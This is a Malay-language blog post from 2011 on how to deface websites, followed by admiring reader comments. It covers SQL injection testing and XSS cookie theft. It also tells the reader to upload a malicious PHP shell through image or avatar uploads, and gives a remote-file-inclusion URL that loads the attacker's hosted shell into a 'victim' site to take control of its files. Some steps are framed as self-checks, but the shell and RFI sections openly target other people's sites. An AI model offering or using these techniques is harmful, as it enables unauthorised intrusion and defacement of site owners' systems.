Thursday, 11 August 2011

Cara Hack Laman Web (Deface)


Ini adalah beberapa cara untuk melumpuhkan laman web yang biasa digunakan oleh hacker.

1. SQL Injection - SQLi
2. XSS - Cross Site Scripting
3. Shells
4. RFI - Remote File Inclusion
5. Dan banyak lagi.

1. SQL Injection

Pada masa ini kebanyakkan laman web seperti forum dan laman web persendirian disambungkan kepada SQL Database. Ini membantu mereka untuk menyimpan ID dan PASSWORD [ENCRYPTED] apabila pelawat mendaftar di laman web mereka.

SQL Database akan berfungsi setiap kali pelawat LOG IN ke dalam laman web mereka.

Semasa proses LOG IN, maklumat ID dan PASSWORD pengguna akan dihantar ke SQL Datebase, sekiranya maklumat yang diberikan betul maka pengguna akan LOG IN ke dalam laman web tersebut, sekiranya maklumat yang diberikan salah maka pengguna akan mendapat ERROR yang menyatakan bahawa ID dan PASSWORD pengguna adalah salah.

Sebenarnya apa yang dilakukan oleh HACKER adalah cuba untuk mengeksplotasi dan memecah masuk ke dalam pangkalan data laman web tersebut untuk mencuri maklumat laman web tersebut.

HACKING jenis adalah paling rumit untuk dilakukan.

Jika anda ingin memeriksa laman web anda terdedah kepada SQLi ataupun tidak maka anda perlu membuat perkara seperti di bawah.

Contoh laman web anda :

lamanwebanda.com/index.php?id=545

Cuma perlu tambah ' pada hujung nombor tersebut.

lamanwebanda.com/index.php?id=545'

Jika ERROR keluar maka laman web anda terdedah kepada SQLi.

Contoh Error :

"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1"

....Dan banyak lagi

-------------------------------------------------------------------------------------------------

2. XSS - Cross Site Scripting

Biasanya kebanyakkan laman web / forum akan menyediakan kotak komen yang menyokong HTML. Ini akan memberi HACKER peluang untuk meletakkan skrip yang berniat jahat di dalam artikel tersebut. Jadi apabila pengguna lain mengklik link tersebut, secara automatik cookies / sejarah internet pengguna akan dihantar kepada HACKER yang meletakkan link tersebut. Jadi HACKER akan memanipulasi cookies tersebut untuk LOG IN ke dalam laman web dan meneruskan kerja untuk deface laman web tersebut.


-------------------------------------------------------------------------------------------------


3. Shells

Ini adalah script .php yang berbahaya. Apa yang anda perlu lakukan, cari laman web yang anda boleh upload apa sahaja file contohnya :- avatars, gambar atau lain-lain. Anda upload file shells anda keatas laman web tersebut dan jika anda berjaya maka apabila anda membuka laman web tersebut, anda akan nampak seluruh akaun "FTP - File Transfer Protocol" di dalam laman web tersebut. Anda boleh mengubah/mengedit/mengupload atau mendownload apa sahaja dari laman web tersebut termasuk laman index. Ini juga dinamakan sebagai DEFACE.


-------------------------------------------------------------------------------------------------


4. RFI - Remote File Inclusion

Ini adalah cara terbaik untuk membuat deface ke atas sesuatu laman web. Ia menggunakan shells. Anda harus mengupload shell anda di laman web anda sendiri.

KOD :

lamanwebanda.com/shells.txt

jika anda menemui laman web yang terdedah kepada RFI, anda harus melakukan seperti di bawah :

lamanwebmangsa.com/index.php?page=lamanwebanda.com/shells.txt

Ini akan memberi anda akses ke atas akaun FTP laman web mangsa. Jadi anda boleh melakukan apa sahaja termasuk mendeface laman web mangsa.

Jika anda ingin memeriksa laman web anda terdedah kepada ancaman RFI ataupun tidak maka anda harus melakukan seperti di bawah ini.

Contoh laman web anda :

lamanwebanda.com/index.php?id=545

buat seperti di bawah ini :

lamanwebanda.com/index.php?id=http;//www.google.com

Sekiranya laman web google dipamerkan dalam laman web anda maka laman web anda terdedah kepada ancaman RFI.

10 Penilaian:

vampire's lovex said...

terer betol ko muz...cayalahhhh

tolong cek kan untk aku leh..hihi


selamat bersahur ! :)

schaze zainn said...

dekat office schaze tak leh upload gambar kat blog sebab under security prohibited.

so kamu ade cara tak nak solve benda ni?hukhuk

Anum said...

hebatnya dia

muz said...

@schaze zainn
Tak leh sebab dia dah pasang aplikasi yang lock upload tu...

newblogger said...

muz, cm ne nak block pc kat opis dr bley bukak laman lucah ek???
da sapew tah sukew sngt bukak bnda2 cm tuh pas opis hour..

sleeping_maniac90 said...

wah.. mmg teror bab hack nih erk??
genius la nih hehehehe

muz said...

@newblogger
awak guna open dns - http://www.opendns.com/

atau k9

sebab2 dua2 benda ini ada filter untuk tapis laman web :)

..cik gugu.. said...

gugu lgsung x phm bab2 nih ;)

gugu tag muz
http://akudanchenta.blogspot.com/2011/08/kad-raya-duit-raya-fairus-ibrahim.html

Siti Mashitah Saidin said...

oooo... mmg tak tau nih...

Aminin said...

hoho..bro mus dah pakar bab2 hacking ni.. antra teknik2 bro nyatakan diatas.. aku cuma pandai maen shell temper data. Yang lain basic2 je masih belajar lagi
Cara Buat Blog Lebih Mesra SEO